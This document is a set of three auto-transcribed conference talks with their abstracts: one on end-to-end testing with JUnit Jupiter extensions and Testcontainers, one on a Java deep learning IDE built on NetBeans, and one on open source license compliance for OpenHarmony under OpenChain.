here. I'm creating here a multi-module build already set so and running that without why a supplemental profile here. We will take a look later at the configuration how it looks like. Okay, start it and you see 13 seconds or something. So let us take a look what is really happening here. I've created a separate module where I have the real test here and I have a directory created here and you see that there is a method name or directory called first test. And in that directory you will find the application standard out. That means the startup of your complete application, in this case the Spring Boot application with all the information you need. I have standard error which should be usually empty. I have created a GC log which is the case because I have configured that into the startup information on the command line of the application. And then we can take a look how that really works. If you want to know some other stuff here, you can take a look because I'm using Maven here in the failsafe report directory. There is an output text file that represents all the output which has been created during the startup session here. There you see the startup here of Docker test containers here. Let a Docker container start it. And if you're going down there then you see somewhere here is the startup of the Postgres database. And you see this Postgres database. So it's downloading that. Take some time here. And we go downstairs here going down through the file. And then we can see somewhere the check if our container is running. That means if our application is running. We are using the health check of the application and just pulling that against that and waiting until it's really ready. Because most of the time most of these services today have a health check and can be easily used for such things here. If it is up there then we know it's up there. And then you see the system output which I have put into the example output here as described here. So now how that looks like all the stuff are working in the extension. So we have two more things here which are very important. The database container is one of them. That means we have a class here very simple which contains a start method which uses test containers to start up a Postgres image here. We are exposing a port. We are trying that several times to be a little bit more safe. We make a timeout in cases there is going something wrong. Then we are defining some environment variables to define the username, the password and the database we are already using. Then delegating to test containers. We do the same thing for the stop method and some other things here. Then we can use that and start up that in our extension and then simply wait until it started. That is a synchronized call in this case here and we wait until the database container is completely started up. You can start in that way for example other stuff if you like like in Redis or whatever you like here that would be possible as well. So we created some directories where we store the resulting standard output information and things like that. That is created by these constructs here. We are getting some information from the context here and creating based on that directory names. So we can create the storage here in a supplemental directory to make a separation between each test run. Then we have application parts which is important to create different TCP iPorts. Simply using that and using the socket details from Spring Framework and we getting two different ports here and defining two different ports. One for the application, one for the actuator here. The actuator is exactly the point with the health check here. Make them separate and give them back to my extension here. So in this case we are using the ports, creating them and then putting them on the command line to define the server port and the management port. And also getter methods have been defined in the database container to get the information from the URL, how it is produced and how it is created. One word, supplemental word about the mapped port. If you start a container on the command line and use a dash uppercase p automatically a TCP iPort is selected which doesn't definitely not clash with other ports. If you do that manually and do that twice you will get a clash between the ports. So that can clash sometimes and usually you should let Docker do that here in that way. Then we have started up our application. So one thing is needed to do is to start up our real application here. And that's why I created this application executor called. That's getting the information of the directory where we should start inside there and how it is named the application. Technically it's not doing something special it's just starting up and using the Java home with the JVM. Just checking if the existence of the file is there. You see there are the JVM arguments. That's the reason why we get in GC log or something like that. That can be changed of course for your requirements. Adding some supplemental calling arguments like the Java dash jar or something like that. That's the start up arguments for Spring Boot. Printing them out on the logger to have more information in cases of errors. And then starting via a process builder this part here redirecting error and setting a working directory here for that. And after that you can start the application and wait until it's up there. The thing here is the is ready is simply using the rest endpoint meaning there are actuator help and check endpoint to wait until it's available application. That can be done in different ways depending on your application. This one I think works with mode of the creation because many many applications today use our actuator for something like Prometheus or something like that as endpoints. And you can use the health check endpoint for that to wait until the application is started. Going down after each as well here we wait doing shutting down the database and awaiting until the database is down. The application is shut it shut it down by a kill signal and then we wait until it's completely down. The details I will take a look later. So the result is that we get the information here from the output all the time here and I can see that it started up correctly. And if I take a look into the output which is created by the show a face if plug in then you see all this stuff and the health check is done and also the information is printed out that my method has been executed. So one thing here is if I do that that way here I can very easily start up a second test without a big issue here. Just simply doing that and if I do that a second time here now that will take some time of course. So that takes a few seconds here to start up that part here. So you see it take 24 seconds because we have started two tests that means the complete application plus the database container has been started up completely two times just sequentially but that has been done. So you can see the results here one application startup lock here and a second one is now created and you see the same thing here. Now you have the possibility to intercept the information and the startup of the application via the usual setup which is already there via before each so we can intercept that and start in before each doing some special stuff if we like to for each of our application that means for two of them in this case I do that here and just calling the rest endpoint of my application here and just creating supplemental entries for the database here just calling the create endpoint here. I'm just printing out something for real use case you should do something different instead of printing out something. So I can rerun that and then you can see the result of that. I will take a number of seconds these are 30 seconds around 30 seconds which takes the time here yes so you see 25 seconds and then you see things like that and then you can see in the output here that if you take a look in that you see the health check here then the running here or in the lock file that will take a time and then you see that the health check of the second call is done here and you see that the create endpoint is called several times here. Furthermore it's also called the list endpoint here is called and you can see that the information is giving back from our application so you can use that for whatever purpose you like. So furthermore there are some special things here to get that internally correctly running here, there are is a so called internal storage which is used here that I said before. I store that here into a so called context here which is provided by the JUnitDupeter framework. Internally this store is more or less a hash map which is synchronized and you can use that in multi-threaded environment. You should use also a namespace for your own extension usually in the name of the class including the package name and so on and then get that store and into that store you can put information. There is a big difference here you can use that and you should use also a unique ID that is a combination of the engine which is run like JUnitDupeter and things like that and thus this information includes also the method name that means this information here is stored by using that which includes also the name of the method which is called for example first test, second test in our class including the class name of course. And that means you can store the information of the database container and that means in consequence that you can completely run this here in parallel so it is possible to do that if you do that correctly with the store here that you can run all the tests in parallel. That's a very good thing in particular if you run such complexity and time consuming end-to-end tests you can run them in parallel if you like but you have to be a little bit careful what you exactly store and how you exactly extract that. Usually there is no choice, no way to give some information from before each to after each and using a local variable is a bad way because it does not work and it's not thread safe of course and using that storage is the only correct way to do that. And then you can use that after each for example get an instance of the class database container for example to stop that also from the application process which is stored at the before each method as well. So this makes it possible to run them in parallel. One more thing is to support parameters here then you have to add an interface implementation which is called parameter, I'm not parameter resolver sorry and these things are used to check if the parameters of before each of the test method itself contains particular parameters which are supported and then you can check the parameters here for example application port, database port and put these informations from the storage into the methods which are returning that as an object here and that means it is possible to have these things here just writing that into your test and inject into your test very easily. So now let us little bit improve the speed here of that test here. So I have preferred something a little bit here and now I run that and you see that last time you run that that took about 25 seconds and now we have two tests running but they are running in parallel and you can do that much more than of them with much more tests end to end test if you like but that depends of course on your machine how many cores you have how much memory you use and things like that and how many components you are studying up or shutting down. And it can increase the speed a lot and you see I am coming down to the speed with 15 seconds as before but I am running two in parallel that is of course possible here as well. So you have a very easy way to separate that as you see I have implemented the extension into a complete separate module you can do that in the before each after each method yourself the first time but it is not a clear separation of concern and not clear separation of the code. I think it is better to use separate module for that because that makes it easier to extract that and put that into a separate project which can be easily reused somewhere else if you like. It is also further more possible to make different extension I have combined at the moment the extension for the database as well as the application. You can do and make separate extension of that for example one for the database startup and shutting down and a separate one for the application startup and shutting down and then you can make it more flexible to combine them but that depends on your use case here. So let us come back to the slides for example as I said different things here as well as possible. And finally I think if you have further questions the Q&A session will be coming there. I have some links about the documentation which I strongly recommend the user's guide. I have made a lecture last year on FOSSTEM as well about basics of JUnitDupeter, the user's guide, extension execution order and things like that and of course a link to the whole code which can be seen on GitHub here as well. Thank you very much and we will see in the Q&A session.
|
You can write unit- and integration tests in different ways, though sometimes you need to write higher level tests, such as end-to-end tests, which are often hard to write. This talk will show you examples of how to write end-to-end tests by using JUnit Jupiter Extension mechanism with the support of Testcontainers and, as a foundation, Spring Boot, in a convenient way. By using frameworks like Spring Boot, there is already very good support within the framework to write tests and integration tests but if you have to deploy not on the Cloud (like DC/OS, K8S etc.), you might have issues to create an appropriate test environment. In particular, if you have several participants needed to get your application correctly running. So, based on JUnit Jupiter, Testcontainers, and some Java code, you can write real end-to-end Tests which are very helpful in several ways. It makes it more or less easy to create end-to-end Tests which can be run via your IDE also. There are several aspect which need to be taken care of, like how to synchronise the application and your test code, and so on.
|
10.5446/52792 (DOI)
|
Hello and welcome to the session Deep Learning IDE on top of Apache NetBeans. My name is Zoroš Ševarač and I'm coming from DeepNet, a startup building Deep Learning development platform in Java that tries to simplify Deep Learning for non-experts. I'm a Java Champion and member of the Apache NetBeans Project Management Committee. So the main idea of how we are making Deep Learning easy for non-experts is to put Deep Learning inside the IDE. So all the procedures and steps that you have to take while building a Deep Learning model are available within wizard project window and visual tools that are well known to software developers and fall into something that we know as a common IDE workflow. The entire platform is built on top of Apache NetBeans and as a proof of concept, one of our users is a 14-year-old boy who learned Java during lockdown and after only two months he was able also to use DeepNet to create a Deep Learning model for his Java-based game. You can read the full story on our blog following the link on the right and also I would like to say that the entire platform is available under free development license. So to get down to the point and show you how it is being done in practice, I will show you a simple image classifier convolutional network which is a very basic Deep Learning model that will be able to recognize Duke mascot images. So it will be able to tell us whether the image contains Duke logo or it does not. As you can see, there is two groups of images, one with Dukes and the other one which are negative examples. The basic principle of how Deep Learning works is to give to a model set of examples and to initiate the training procedure. By the way, entire video is available on the link below. So this is how this main screen of a DeepNet application looks like and in order to build this image classifier based on a Deep Learning model, we are going to run the new project wizard. We start with DeepNet's project, we will say Duke project. And as a first step, wizard ask us what do we want to do? We say we want to classify images and other type of mass showering task which are available is also to classify data or to predict the value. The next step is to input how many image categories we have. Here we have only two image categories, Duke and non-Duke which is well known as a binary classification problem. So we select the option with two categories. Next step is to select image, to select directory which contains training images and we have prepared this kind of training set here in Duke set and it automatically finds this index file and labis file which contains just a path to different images. Next step, we select the size of the images because all images have to be scaled to the same size. And in this case, all the images are prepared already for the size 64 times 64 pixels but in the case they are not, you can choose different options to resize these images. So this is a good example of how this wizard guides you in preparing data and performing typical steps which are considered to be a best practice in preparing data for Deep Learning. And some of these steps might not be familiar to software developers which don't have experience with this type of task. Also there are additional pre-processing options which help learning algorithms to learn better. Now the next step is specifying neural network architecture and here you can see some of the parameters of the neural network are already pre-configured from the data entered in previous steps. For example, the dimensions of the input layer which corresponds to image dimensions and since it is a classification problem, the loss function is configured and also number of neurons in output layer and output activation functions. So this is the way how we provide predefined configuration settings for specific tasks so user don't have to know all the details about the model they are trying to build that task to solve. So we enter here the basic configuration for the convolutional network. This convolutional layer acts as a feature detector so it can learn to recognize features in image pixel patterns so called and we'll put just three channels once a very small network and let's put this 32 neurons in a fully connected layer. Now the next step is to configure training and testing data. For this step you don't even have to, you can use provided default which means splitting training and test sets into two parts 70% for training and 30% for testing. This is done because we want to see how will our model work with the data it has not seen during the training and as well as in the previous step the reasonable defaults are provided. The next step is very important and you are given different parameters to tune the learning procedure and the provided values are like a default and if you just click finish you will get the basic settings for building a deep learning model. All of these settings will be very easy to edit and pre-configure later in the process and the good thing is that when you build some model for data the first time you don't have to understand and know all the details about configuring this. Just run the wizard and you'll get the entire configuration that you have to run like this initial training. Now what you see here now is so called visual machine learning workflow which has been generated with this wizard and it includes all the steps for running the training and you can easily access all the configuration settings that were entered in the wizard. For example for data set if we click data set it opens the data set file which are given as a properties file you can see something that is very familiar to Java developers and all the settings entered in wizard are here. Next for neural network architecture it is specified as a JSON file and you can very easily change layer types or image size or anything else. In addition there is a visual neural network architecture builder in which you can visually inspect the neural network architecture and see the settings for each of the individual layers here in properties table. That makes it very easy to later change some of these settings and try out different configuration which is very common procedure while building a deep learning model. And this box here represents the settings for the training procedure and you can see here we have for example settings for the maximum error since the deep learning procedure consists of lowering the prediction error for the given training set and it is being performed iteratively in so called epochs and here we have specified also the maximum number of epochs. Now when you have all these things configured there is one more thing this is a model evolution which corresponds to testing model. Once you build the model you want to see how it performs with unknown data, the data that it has not seen which was data that was not used for training and it calculates classification metrics which is a set of values which tells us how good is network at classifying the images. Now this training file here is the key for running a training and in order to run it you just hit this play button in the toolbar like you used to do in your software development projects and let's check this option for visualization so we can visually inspect the training procedure. Now at the moment this tool supports deep nets deep learning framework but there is ongoing development to support also TensorFlow and there will be option also to run training remotely on the cloud. At the moment you are able to run trainings on your local machine. Next when we start training you will see the lock window will display what it is doing and here we have nice visualization as you can see how the network is being fed with images, what happens in the input layer and how it applies different convolutional filters and scales down images and how it is being propagated through the entire network to the output. So this one neuron is output and it is saying when it is red it has high activation then it predicts that the image is duke and when it is not it means that it is not a duke. Here we have information about the training as you can see the initial error was 0.69 and after just one epoch or one pass through the entire data set the network is lowered to 0.23 and the training accuracy is 0.97 which is 97%. As you can see since this is a very small data set and small network it is being trained very quickly and it shows you how you can quickly train deep learning model for recognizing like a smaller number of training images. Now we can also speed things up this is intentionally slowed down it will run very fast and here we are going to show you also this training graph which shows you how the network is lowering down the value of the loss function is going down during the training iteration and how the accuracy is growing up. And after the training has been completed the testing or evaluation procedure will automatically be performed and it will give you some numbers down here which tells you how good network is at predicting duke images. As you can see accuracy for the training set was 0.99 and what is common is that accuracy with test set is a bit lower which is 0.96. Now there are also other information for example precision which tells us how often is specified correct when it gives positive prediction. One nice thing is that besides giving you all these numbers deepness tell you what each of these numbers means. The other metric for example is recall which tells us when it is actually positive class when it is actually a duke image how often the classifier gives positive prediction. And metric which is kind of a balance between precision and recall is F score which is harmonic average of precision and recall. Now all these values are being extracted for something that is called confusion matrix and as you can see this diagonal most of these images these are true negatives and true negatives are being guessed correctly only 7 images are not guessed correctly. So now if you want to see what images are not guessed correctly we have a tool to do that and I forgot to mention the train network is being generated here in a folder named train networks and this is this dnet file and if you want to create a jar file you can use in our application just right click that dnet file and say create jar and it will automatically generate jar with our deep learning model. And entire training procedure is available in this training log file which tells us how the model is being built and give us the main information about the accuracy for a specific test set. Now if you want to for example inspect the images that have been used for training we use this image dataset explorer and when we select some specific class we can see all these images of dukes that were used to train the network. If you want to see the negative images these are blocks of color and color rectangles which we use just to make sure that the classifier is not reacting just to any color. Now we have a tool to test this entire train network for the image set. We select the network to train and we select dataset and then we say test all images. And now as you can see you get a list of images from the data that has been used for training and for each image we say what is the actual class of the image, this negative and what the class is recognized, this is negative. And what was the output of the network? If the output of the network is higher than 0.5 then this network has recognized input image as a duke. You can see this is a duke, even if it is 0.5 image it is a duke and this green rectangle is not a duke. This is a duke and this is a duke. Now if you want to see what are the mistakes, what image were not recognized as a duke we click here only false prediction. And we can see that some of these images this all white was recognized as a duke which is not good. Now you can see this was not also recognized as a duke and these are one that we have to pay attention to and change some parameters for the network and train it better. So this is how you can, as you can see just running one wizard and taking a few tools you can build and evaluate your deep learning model and you have it ready as a serialized Java object or even as a Java file. Now once you have deep learning model what do you do with it? Well you can load it in your Java application like this. This is an example. How do you load convolutional neural network here? You just use create from file method from file EO, IO utility and then you create image classifier and then go classify method. Now this image classifier interface and convolutional image classifier they come from the visual recognition API which is the standard Java API for visual recognition tasks and deep net is community edition of deep net is being used as a reference implementation for this API. It is a machine learning based Java API for visual recognition tasks. So you can see in only two lines you perform recognition of image load model and then you go classify model, classify method and feed it with some image. You can see if we can write it here, you get result as a map that contains corresponding probability that image belongs into the category Duke is 0.99 as you can see. The other option is to use training directly from the Java code so you can do also that and this is an example how this can be done without this user interface. In that case you need to know more details and for some advanced options you need to understand more of the machine learning and deep learning workflow but it is possible to do it if you prefer it that way. However it is much easier to build the model using this graphical user interface. So on this GitHub repository you have examples that you have just seen and you can download deep nets and try it on your own. So one of the questions we very often get is when to use deep nets when there are very advanced deep learning frameworks like TensorFlow, deep learning for J and so on which supports GPUs and distributed training and so on. But deep nets is pure Java and supports most commonly used deep learning algorithms. So it is very simple and easy to integrate with an existing product. It is highly portable, it does not have dependencies on all the native libraries and it is very friendly and easy to use. I think that is one of the most important features. It is much easier to use and understand by an average Java developer than any other framework out there. So I would say that you should consider using deep nets when you want to integrate deep learning into existing software products in order to make it smarter and when you don't have huge amounts of data, when you have a smaller number of specific objects to recognize for example then it is difficult for you or maybe you don't need to gather the large amount of training data and you don't require high level of generalization to be able to deal with all different variations of that input. In that case, smaller models with smaller dataset, deep nets can learn very well and provide even higher accuracy than working with huge models with big deep learning frameworks. Also when you have hardware constraints like in all the edge AI use cases, limited CPU and memory and you don't have specialized hardware like GPUs, then deep nets can be an ideal solution. The main advantages for using deep nets is that for these kind of problems you get a better accuracy with less data. We have lower CPU and memory requirements and it is highly portable and can be integrated on every Java enabled device which makes it easier to build, run and maintain. In order to get started, you can go to deep nets slash getting started and you can look at follow the instruction to download and set up and there is a good documentation and also some examples on our blog how to do parking lot, occupancy detection, how to do cloud recognition and many others. Thank you very much for listening to the presentation and if you have any questions or suggestions, feel free to get in contact us on Twitter or any other way you like. Thank you, bye.
|
Most software developers are not also data scientists or machine learning experts. They don't know machine learning workflows, math, data analysis and model building practice, and tricks. Mastering these skills can take months or even years. Learn about the shortcut that can quickly turn a software developer into a deep learning developer: an IDE that guides you in building advanced machine learning models and deploying them into your applications.
|
10.5446/52782 (DOI)
|
Good afternoon. My name is Carlo Piana. I'm an Italian lawyer dedicated to free and open source software mainly. And today we are presenting with my good friend and client, David Ricci, on Open Chain in Open Harmony and how the two play together and what we are doing for achieving, finally, eventually conformance to Open Chain. So in a short time, I will be handing over to David to present himself. Of course, as this is a pre-recorded statement, we are ready to answer any of your questions. I will be joined by my good friend and colleague, Alberto Piano, who is also available for taking questions. And any curiosity, any questions, please don't hesitate. David, over to you now. Thanks, Carlo. Carlo, can you see the screen? I can see your screen. Perfect. So thanks for handing it over to me. So my name is David and I'm joining you guys from Milano. It's a pleasure to be here. And Carlo has invited me to present Open Harmony. So we'll start from there. And then he's going to take over and explain better Open Chain and how the two work together. So David, I'm the director of the open source technology center at Wildwood. I have a master of science in computer engineering, degrees, artificial intelligence and robotics, and I spent 15 and plus years in open source at Moondrower. And Moondrower was part of Intel, worked very closely with the tele-open source technology center at that time. Throughout my career, I've been a bit of everything from Linux kernel developer to field application engineer, product manager, director of product management, and general manager of open source platform teams. And in this capacity, I run the open source technology center at Wildway. I've contributed to many open source projects, including the after projects, separate project, Open Chain, Open Virtualization Alliance, work with the Clis and use the Clips IDE for my open source product in the past and plan to use it in the future. So what is Open Harmony? So Open Harmony is meant to be an operating system, a software stack across all consumer devices. The idea is that to build an edge to cloud operating system. It's been initially developed by Wildway under the brand name of Harmony OS, and then it's going to be progressively contributed to the open source community under the brand name of Open Harmony. The goal is that to leverage the broadest spectrum possible of open source components. And as you guys know, each component in open source can't really turn license and copyright and license dictated obligations. The idea is that to deliver on the promise of autonomous cooperative devices. So the goal is that once we integrate existing kernels and open source components together, and each device, consumer device, say in the household, share the same operating system. Now you can start developing and enabling interesting things such as devices knowing that they exist, one with each other, devices understanding what applications they need to fulfill together, and devices collaborating one with each other to fulfill an application. The example that I use typically at this point is supposed to you're doing a multimedia zoom call, like the one that we're registering recording this talk onto. And you started from your phone. And your phone detects that there are open Harmony devices running in the house, namely TV with a 4k display and the microphone for your telephone and suddenly Dolby speaker surround. And then the phone and the application will ask you if you want to run in an optimized way, which means that you're going to be leveraging the display from the 4k TV for the best experience possible. You're going to be leveraging the microphone from your phone because it's close to your mouth and the voice. You're going to be leveraging the surround speaker from your Dolby surround system because that's where the audio is best processed from. So the idea is to integrate as many open source components as possible to build the ultimate vision of intelligent, complicating consumer devices. The initial code is being donated in China. You can find it on gt.com, open Harmony. Effectively in Europe, we are developing the European version of it that has slightly different requirements initially when it comes, for instance, to the way that we cooperate with partners by leveraging existing foundation-open governance. And certainly we're making IP compliance and false compliance as one of the top priorities. The idea is that by March, I have a bit of a roadmap later, we're going to be donating the first code base to the European set of customer and the first official release of the project will be released in November later in 2021. So why false compliance must come first and why open source, why myself, and why after many years in the open source community, and why is open source strategic to why? Well, it is strategic to why with multiple reasons. Number one, it does break vendor lock-in. So effectively, no companies is locked into the technology provided by another company or wherever those companies are located. It means that all of our products are built upon technology that is shared by most of our customers and partners as well. If it's done right, and I underlined the fact if it's done right, it does increase the brand value for Huawei. It also means that all eyes are on us to do it right. So if done right, you know, it's expected, but if it's not done right with all eyes on us, then that's going to be a problem. And doing it right means putting false compliance and IP compliance at first. And it was one of the initiator of the Open Chain project when I was back in the States. I think it was 2015, if I'm not mistaken. And so coming from the software as a product mindset, and I know that, you know, having a policy that captures roles, responsibility and processes for dealing with components of open source nature is paramount to assess the risk of releasing a product and doing something with that risk. At the end of the day, it's about business decisions. And the business is best done if the risks are calculated, right, and managed. So Open Chain, false compliance, IP compliance policies allow somebody who is supposed to release an open source product to know exactly where the risks are and take the right decisions. I lead the Open Source Technology Center, ESSEP, which is an open source group that has been built by Huawei in Europe, leveraging talents across the side of R&D centers that Huawei has in Europe. Right now at the moment, we have people in Milan like myself, Munich, Warsaw, Helsinki, London, court, Lyon, as well as R&D personnel in India. The Open Source Technology Center has been run as a BU, so software becomes core and strategic since open source is strategic to Huawei. So we're running it with an R&D group, but we have engineering, functions, marketing, product management, field engineering, evangelism, and yes, IP compliance, so an audit group, etc. And of course, the first big project, as I mentioned, is Open Harmony, right, to take you to Europe. A bit of timing, and a bit of a team that is working on false compliance before I hand it back over to Carlo. So as I said, OSDC was funded at the beginning of 2020, so we're spending time staffing the key functions and building up the team that you've seen some faces from in the slide before. Building processes and infrastructure, one of those processes is IP compliance and infrastructure are for instance, compliance scanning toolchain based on saver use and facology. Carlo would talk more about that. Then before you launch an Open Source Project in any location, you do a market analysis, you understand your partners and the market needs. In September, the first technology became available from Harmony to Open Harmony from China. Since then, we've been onboarding partners and we've been assessing the technology, understanding the readiness for the launch in the European market, building a DevOps infrastructure, preparing the code. And then in September, at the same time, we started the activity around license compliance. And a bit more in for that, you know, just go back to September, we started by looking at the policy. Once the policy was somehow sketched, we started training personnel, because one of the important points of the Open Chain compliance is training for personnel. At the same time, we started setting up DevOps toolchain for IP compliance, any component that we bring in, you know, scan, and then it's, you know, it's the license is determined, and then if there's a risk, it's flagged. So that would do this continuously as early as possible, release early release often. We don't keep, you know, IP compliance and fast compliance as an afterthought. But as you can see, it's done since the very beginning. This led us to the generation of the first bill of materials. So the analysis of and creation of the manifest of all the components that we have integrated with your license. And, and then once it's done, it's about tweaking, right? It's about this is never done, you start early, but that is never done, because you have to tweak the policy, new open chain specifications comes available, you update the policy, you train new personnel, you make the bomb better, you update the toolchain DevOps pipeline. So it's about continuous improvement over time. So it's something that if you start early, you minimize the risk where you cannot stop. So you have to keep training and improving, right? There's no getting, you know, there's no staying the same. It's about either getting worse or better. So we definitely want to get better at this. With this, introducing the IP compliance project for open harmony. Carlo, I'll stop presenting and I'm going to hand it over back to you. Oh, thank you, Davide. That was really interesting. I've seen this already, but anytime it's it's all the more fun. So we decided to prevent this introduction because you know what the scope of the project is. And so also the magnitude of the project and therefore the task that's at hand with us. And, and also the stage of development. So as David has said, this is something that comes from the very beginning, thinking about open source compliance and open chain conformance. So this presentation is not to just to praise us how good we are and what we have achieved, but it's rather to expose ourselves to the to criticism possibly or to and for by all means to be sort of forced to be delivering what we are probably. So this is not a one off thing is something that we plan to redo maybe next year, maybe the year after. So in a bit of more formal context, this is to my reckoning, the first time that we are seeing a new operating system or all the more a new open source operating system being developed in the full open since day one. When strategic decision are still liquid, everything is possible. Therefore, I cannot but praise the decision to get us on board since the beginning. The fact that we are interacting with the development team not just to ensure compliance as an exposed, but helping devising the whole process in the beginning. It's something that we believe is a prime for a project, at least of this magnitude and so ambitious. So in my understanding, and from my experience as well, conformance and compliance are usually done later in the process by retrofitting an environment where compliance were delayed to a later stage of maturity. I myself, when myself and my colleague Alberto have been summoned to a compliant process, we perceived that our intervention was kind of seen as a necessary perhaps, but an annoyance or a source of delay. This is different. This is a long preamble to just say this is not the grand finale of a success story, is not an epic journey, is not the depiction of the battle over the Pelinore fields. It is rather maybe a number of zero of a series that we trust will be, if not entertaining, at least interesting and somewhat instructive. So out of metaphor, as I said, we plan to be back and reporting you, but for the time being, we have the secret ambitions to be setting an example for other projects as to what it is possible to do even for a corporate sponsor, like large projects, which is directed at satisfying an entire wide industry from IoT to entertainment devices to smartphone. But that now some juice. First, what? What we are making possible, we're making public. And as David said, pretty much everything. And by pretty much everything, as I said, things that normally get done are not exposed, like the guts of the process, the entire project will be exposed. And all the more, Huawei is even going to donate the entire project to a newly formed working group within a well-respected and independent foundation. So the project in this new incarnation will inherit what we're doing now. And it's important to stress that since Huawei is going to be also a client of this new form, newly formed working group, no effort will be spared by it to make sure that also the project upstream is conformant to Open Chain as Huawei OSDC wants to be. So it's well playing both sides of the net. The when is also important. As I said, from the beginning, we are making available everything as they become available to us. So for the first bit has been the policy and in future, we have many things in the world. Some of that are house bake, off-credits. Some of them are more advanced. So bear with me. Policy first. This is not finalized too, but it's quite advanced. We have decided to, and you can find it, there is a link in the slides, we have decided to separate the public part with something more company specific, but we shifted pretty much the everything to the public side. Also the implementation base. So you will find there, of course, the overarching rules, the principles and the roles. And as they become available also, the many, many of the things that the roles, the interplay between the very various actors and so on and so forth. Other things on privacy concerns mainly will not be made public, like the actual names who has gone through compulsory education and so on. But the rest will be, and is already somewhat public. Now the forward looking, something that you are not yet able to see, but you will be seeing in a near future. So the tool chain is built on two main building blocks, which are scan code and phasology. One might wonder why we are using something that is often perceived as covering more or less the same. We have an extensive experience in using phasology. We have even, I am and mainly my colleague, Alberto Pianon, have developed a tool set to complement phasology for compliance works. And we have been pointed out to scan code, which is also very good. And when deciding which one to use, we decided to use both. Because one complements the other, in some cases, scan code has better results. Sometimes phasology has better results. But combining that together, we are feeding more quality information and we cross-check what we find from the actual automated scans. We have worked with Neutech Park of Bolzano to make this available directly into a CI pipeline in GitLab. So everything should be, is already working and is working by making everything. And I am showing you in a second how this is being implemented. So this is quite difficult to read because it is made with plant UML. But I am trying to explain to you what you are seeing here. We have basically five different actors. One is developers, of course. There is a GitLab CI pipeline. This is the most interesting bit. It is a phasology wrapper, something that does things that are fed into phasology, which is the fourth. And of course, as Open Chain mandates, there is a noted team that follows and takes the decision. So first, we have some triggering events, like committing on a massive branch or using a new tag, whatever. This is yet to be decided. It will be decided. And this triggers the CI pipeline. The CI pipeline just provides package sources and metadata. And this is the place where the most interesting bits happen. Of course, the sources are uploaded to phasology made available for scanning. The developer triggers running built-in scanners in phasology. And at the same time, in scan code, scan code will pass the results to a phasology through an SPDX, which is slightly changed. And this is also very important. We have a database of past decisions. So we are reusing decisions that we have made in the past. And possibly, we have imported from other sources. We will come to that in a few minutes. All of this is, of course, fully automated. But that doesn't end with that. Of course, phasology outputs its own report as a raw report. And the wrapper adds information and consolidates that phasology establishes licensing to the single file level. And we are condensing it and making information as to the project, the package. So we are presenting information to the package. Additionally, this is not the pipeline that has a pass-non-pass. Ideally, the pipeline doesn't stop further adding new comments. But at the same time, it outputs information for the developers that make evident what the status of the package analysis is. So we use status badges. These are yellow because there hasn't been no final decision, no assertion, because this is just the result of automated scans. And it's not yet ready for shipping. So the developer knows what the status is. But this package, this project is not really to ship in this form. What misses? The missing part is the human decision. No package will be out without human interaction and human decision. So the audit team is notified and prompted to look into the raw report and to make decisions which will depend. The next part, if there are no new commits in the intervening time occurs, the audit team just launches the pipeline after having provided the necessary information and decisions. So the pipeline is run again. And of course, if there is nothing new, no new versions. And by new versions, I mean no new major versions, because we're not just making a one comparison to say if the hash is identical. We assume that if the no major version of the package has been added and no big variations in the language occur, the package is the same. So we can reuse the decision where they've been made and a new SPDX generator. And this time, it runs again, this time you see a lot of green and blue, meaning that all the files in the package have been processed, the SPDX is available. And we have concluded this package is Apache 2.0. This is not enough yet, because this is a package level. But package can either have many or several license applicable depending on the decisions you make at the compile time. Plus, these does not tell everything about the interaction of this package with other package, possibly with copy left publications. So you need to do another step, which is generating a graph of dependencies. In our experience, from our point of view, you can do it only at build time, because only when you have a completely built version of the package, you know what counts. And the best way we have found so far is to do a binary analysis. Also, because SPDX cannot store abstract dependencies of the package in a native way, and so there's a machine readable way. And this is a job that we have devised that tree for storing and reusing this information. And this leads me to another bit, which is quite important and bear with me, because this is something for which we need advice, perhaps, or we need a contribution. So I said that we reuse the result of our scans and decisions, but since OpenHarmony uses Yocto and Yocto is built for making an entire distribution, many other packages are just called in. They are inserted, and they need also to be scrutinized. And there is a lack of information on this decision from the outside. And it's difficult to find this. Clearly, the find is there for that, but they are at a very different focus. So we are planning to use already reliable, very reliable information from, for instance, the Debian to present a curated database that comes from reliable sources, is processed by us, and will be made available either by CC, Creative Commons, or ourselves, and maybe contribute, also contributed upstream to a project, maybe clearly define what we are, the things. And this is going to be a full SPDS compliance and really with a few transformations to be fed into physiology. And if you know of other efforts, and if you know of other initiatives comparable or have suggestions, please by opening Fly Them Up. Very quickly, because we're running out of time, we also are committing to reuse. Reuse is a project of the Software Foundation Europe, and is a standard for declaring copyright statements in a standard wise way, so that for your own software, you are telling out with a clear voice with a one single language, what is the what is the license applicable to your own software. And we are, on the one hand, we're trying to convince and to lead by example to our downstream implementers to also use these for their own projects. And the second bit, since we are convinced that this is one of the ways to go for easing up compliance, to do the same and proposing as a pull request to our upstream to also use this as their foundation. So this is something we are still have to decide, but it's just an idea, but we are happy to hear your comments. This has been, I think, a quite comprehensive view of what we have so far and we project to do. And of course, we are, as I said, ready to take your questions, your comments, perhaps some of them have already been answered. And I hand over to David for the final bye bye. Thank you. Thank you, Carlo, and thank you, everybody. It was a pleasure to speak and fuzz them again. Any questions, you guys know where to find us. And with this, I think, you know, that's it. Adios, bye bye. Thanks very much. Bye.
|
OpenHarmony is a new operating system stewarded by Huawei's Open Source Technology Center, with Array as advisor. Having prioritized compliance, governance and transparency, OpenChain was the natural backdrop for it. Rather than embracing open source only to exploit it, having transparency and compliance as a last minute afterthought, OSTC has made them central pillars from the very beginning. We seek the opportunity to present you how the goal of OpenChain conformance helped. Born as an internal project, since its conception OpenHarmony's future has been to live in an independent, respected foundation that will receive all the tool for keeping it a truly community-driven operating system. The tools that Will be donated do include a compliance toolchain with source code scanning, compliance policy documents and roles, a Bill of Material for the initial release and many other artifacts to make it sure compliance is not a one-off exercise, but an ongoing commitment for the entire life of the project. Full conformance with Openchain is projected in a short-term future and it is surely a motivation to start with the right steps and making the right choice off the very beginning of the project.
|
10.5446/51220 (DOI)
|
